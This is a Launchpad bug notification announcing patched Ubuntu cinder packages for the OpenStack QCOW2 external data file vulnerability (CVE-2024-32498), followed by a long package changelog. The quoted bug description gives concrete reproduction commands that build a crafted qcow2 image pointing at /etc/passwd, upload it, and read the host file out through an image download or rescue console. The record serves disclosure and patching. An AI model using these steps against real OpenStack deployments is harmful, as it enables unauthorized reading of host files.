[Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)

James Page 2059809 at bugs.launchpad.net
Mon Jul 8 12:58:20 UTC 2024 

This bug was fixed in the package cinder - 2:24.0.0-0ubuntu1.2~cloud0
---------------

 cinder (2:24.0.0-0ubuntu1.2~cloud0) jammy; urgency=medium
 .
   * SECURITY UPDATE for Ubuntu Cloud Archive. backport to jammy.
 .
 cinder (2:24.0.0-0ubuntu1.2) noble-security; urgency=medium
 .
   * SECURITY UPDATE: Arbitrary file access via custom QCOW2 external data
     (LP: #2059809)
     - debian/patches/CVE-2024-32498.patch: check for external qcow2 data
       file.
     - debian/control: added qemu-utils to Build-Depends so qemu-img is
       available for new tests.
     - CVE-2024-32498
 .
 cinder (2:24.0.0-0ubuntu1) noble; urgency=medium
 .
   * New upstream release for OpenStack Caracal.
 .
 cinder (2:24.0.0~rc1-0ubuntu1) noble; urgency=medium
 .
   * d/watch: Track Caracal series releases.
   * New upstream release candidate for OpenStack Caracal.
   * d/p/*: Refresh.
   * d/control: Align (Build-)Depends with upstream RC.
 .
 cinder (2:23.0.0+git2024011915.b8cd101f-0ubuntu2) noble; urgency=medium
 .
   * d/tests/control: Add rabbitmq-server to Depends.
 .
 cinder (2:23.0.0+git2024011915.b8cd101f-0ubuntu1) noble; urgency=medium
 .
   * New upstream snapshot for OpenStack Caracal.
 .
 cinder (2:23.0.0-0ubuntu3) noble; urgency=medium
 .
   [ Mauricio Faria de Oliveira ]
   * d/p/py312-tests-mock-assert.patch: Add prefix assert_
     to mock object assertions missing it (stricter in 3.12).
 .
   [ Corey Bryant ]
   * d/control: Update min version of python3-taskflow to
     ensure it supports Python 3.12.
 .
 cinder (2:23.0.0-0ubuntu2) noble; urgency=medium
 .
   [ Corey Bryant ]
   * d/gbp.conf, .launchpad.yaml: Sync from cloud-archive-tools for
     caracal.
   * d/control: set min version of openstack-pkg-tools to ensure
     Should-Start/Stop is fixed.
 .
   [ Mauricio Faria de Oliveira ]
   * d/cinder-volume.init.in: add tgt to Should-Start/Stop (LP: #1987663)
     Requires rebuild to pick up openstack-pkg-tools 123ubuntu2 in noble.
 .
 cinder (2:23.0.0-0ubuntu1) mantic; urgency=medium
 .
   * New upstream release for OpenStack Bobcat.
 .
 cinder (2:23.0.0~rc1-0ubuntu1) mantic; urgency=medium
 .
   * New upstream release candidate for OpenStack Bobcat.
 .
 cinder (2:22.1.0+git2023090509.f79048d2-0ubuntu1) mantic; urgency=medium
 .
   * New upstream snapshot for OpenStack Bobcat.
   * d/p/install-missing-db-files.patch: Install missing db files, including
     cinder/db/alembic.ini.
 .
 cinder (2:22.1.0+git2023071214.c1a18fcd-0ubuntu1) mantic; urgency=medium
 .
   * d/gbp.conf, .launchpad.yaml: Sync from cloud-archive-tools for
     bobcat.
   * New upstream snapshot for OpenStack Bobcat.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/skip-mock-spec-failures.patch: Dropped. No longer needed.
   * d/p/CVE-2023-2088-*.patch: Dropped. Fixed in snapshot.
 .
 cinder (2:22.0.0-0ubuntu4) mantic; urgency=medium
 .
   * SECURITY UPDATE: Unauthorized File Access (LP: #2021980)
     - debian/patches/CVE-2023-2088-1.patch: Reject unsafe delete
       attachment calls.
     - debian/patches/CVE-2023-2088-2.patch: Doc: Improve service token.
     - CVE-2023-2088
 .
 cinder (2:22.0.0-0ubuntu3) mantic; urgency=medium
 .
   * SECURITY REGRESSION: Regressions in other projects (LP: #2020111)
     - debian/patches/series: Do not apply CVE-2023-2088.patch until
       patches are ready for all upstream OpenStack projects.
     - CVE-2023-2088
 .
 cinder (2:22.0.0-0ubuntu2) mantic; urgency=medium
 .
   * SECURITY UPDATE: Unauthorized File Access
     - debian/patches/CVE-2023-2088.patch: Reject unsafe delete
       attachment calls.
     - CVE-2023-2088
 .
 cinder (2:22.0.0-0ubuntu1) lunar; urgency=medium
 .
   * New upstream release for OpenStack Antelope.
   * d/p/skip-mock-spec-failures.patch: Rebased.
 .
 cinder (2:21.1.0+git2023030309.3ddce92b-0ubuntu1) lunar; urgency=medium
 .
   * d/control: Drop min version of python3-mypy to enable backport
     to cloud-archive.
   * d/watch: Drop major version.
   * New upstream snapshot for OpenStack Antelope.
   * d/p/skip-mock-spec-failures.patch: Rebased.
 .
 cinder (2:21.1.0+git2023022212.0af3df67-0ubuntu1) lunar; urgency=medium
 .
   * New upstream snapshot for OpenStack Antelope.
   * d/control: Align (Build-)Depends with upstream.
 .
 cinder (2:21.1.0+git2023012815.c9e65529-0ubuntu1) lunar; urgency=medium
 .
   * New upstream snapshot for OpenStack Antelope.
   * d/control: Align (Build-)Depends with upstream.
 .
 cinder (2:21.0.0+git2023011009.2db3fc3e-0ubuntu1) lunar; urgency=medium
 .
   * New upstream snapshot for OpenStack Antelope.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/skip-mock-spec-failures.patch: Skip tests that are affected by
     "Cannot spec a Mock object" failure.
 .
 cinder (2:21.0.0-0ubuntu1) kinetic; urgency=medium
 .
   * d/watch: Scope to 21.x.
   * New upstream release for OpenStack Zed.


** Changed in: cloud-archive/caracal
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to Ubuntu Cloud Archive.
https://bugs.launchpad.net/bugs/2059809

Title:
  [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
  (CVE-2024-32498)

Status in Cinder:
  Fix Released
Status in Ubuntu Cloud Archive:
  Fix Released
Status in Ubuntu Cloud Archive antelope series:
  Fix Released
Status in Ubuntu Cloud Archive bobcat series:
  Fix Released
Status in Ubuntu Cloud Archive caracal series:
  Fix Released
Status in Ubuntu Cloud Archive ussuri series:
  Fix Committed
Status in Ubuntu Cloud Archive yoga series:
  Fix Released
Status in Glance:
  Fix Released
Status in OpenStack Compute (nova):
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
  QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.

  Steps to Reproduce:

  - Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
  - Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
  - Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
  - Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.

  With the non-bootable instance there might be two ways to continue:

  Option 1:
  - Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
  - Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
  - The file content starts at guest cluster 0

  Option 2: (this is untested because I reproduced it only in a production system)
  - Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
  - Go to the Dashboard, open the console of the instance and login to the instance.
  - Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
  - It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions

More information about the Ubuntu-openstack-bugs mailing list